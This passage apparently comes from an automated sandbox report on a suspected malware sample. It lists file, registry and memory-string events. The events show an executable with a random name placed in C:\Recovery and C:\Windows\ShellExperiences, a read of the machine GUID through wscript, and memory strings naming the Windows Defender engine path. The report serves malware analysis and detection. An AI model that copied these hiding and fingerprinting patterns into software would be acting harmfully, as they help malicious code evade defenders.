                                    Source: C:\Recovery\uAsLgsGzSk.exeQueries volume information: C:\Recovery\uAsLgsGzSk.exe VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\ShellExperiences\uAsLgsGzSk.exe VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0091DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0091DF1E
                                    Source: C:\Users\user\Desktop\hz7DzW2Yop.exeCode function: 0_2_0090B146 GetVersionExW,0_2_0090B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
                                    Source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.00000000034A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
